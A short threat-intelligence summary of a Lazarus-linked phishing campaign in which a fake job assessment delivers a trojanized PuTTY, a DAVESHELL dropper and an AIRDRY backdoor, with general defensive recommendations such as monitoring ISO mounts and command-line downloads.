North Korea-linked threat actors, including the Lazarus Group, have been detected leveraging a novel spear phishing methodology that involves the use of trojanized versions of the PuTTY SSH and Telnet client. Researchers at Mandiant observed an attack that started with a fake job lure via email, which led to the attacker sending a fake “job assessment” in the form of an ISO file over WhatsApp. This ISO file contained an IP to connect to, logon credentials, and an altered version of the PuTTY application. When executed, this PuTTY application loaded a dropper called DAVESHELL, which then deployed a variant of a backdoor known as AIRDRY that has been seen used by North Korean actors in the past. This version of AIRDRY then downloaded plugins that were executed in memory in order to conduct their post-compromise activity in lieu of the typical command-based approach seen by past variants of this backdoor.
As with most threats, the entry point in this attack stemmed from phishing – this highlights the need for user training and enforced email policies and ensuring email scanning systems are properly configured to flag inbound emails containing suspicious attachments or URLs. Additionally, this attack highlights the gaining traction of initial access via ISO files that has been growing among threat actors. To combat this, it is important to monitor any suspicious ISO mounts in the environment. Additionally, it is important to monitor any file downloads stemming from PowerShell or the command line, which would have likely detected DAVESHELL.